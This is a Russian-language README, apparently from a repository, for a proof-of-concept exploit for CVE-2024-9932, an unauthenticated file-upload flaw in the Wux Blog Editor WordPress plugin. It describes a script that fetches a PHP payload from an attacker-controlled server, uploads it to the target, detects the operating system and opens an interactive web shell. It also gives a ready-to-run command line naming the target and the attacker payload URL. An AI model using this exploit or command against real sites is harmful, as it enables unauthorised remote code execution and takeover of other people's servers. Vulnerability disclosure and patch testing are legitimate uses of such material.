
Неаутентифицированный 0-click RCE-эксплойт для CVE-2024-9932. Использует уязвимость произвольной загрузки файлов в плагине Wux Blog Editor для WordPress, чтобы загрузить удалённый PHP-payload, определить операционную систему цели и получить удалённое выполнение команд через интерактивный web-shell.

Этот репозиторий содержит эксплойт proof-of-concept для CVE-2024-9932 — неаутентифицированной уязвимости произвольной загрузки файлов в плагине Wux Blog Editor для WordPress, приводящей к удалённому выполнению команд (RCE).
Скрипт использует уязвимый REST-эндпоинт для загрузки удалённого PHP payload без аутентификации. После загрузки он восстанавливает итоговое местоположение файла, определяет операционную систему цели и предоставляет интерактивную удалённую оболочку для выполнения команд.
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
После выполнения скрипт загружает payload, подтверждает его доступность, определяет ОС и переходит в интерактивную оболочку.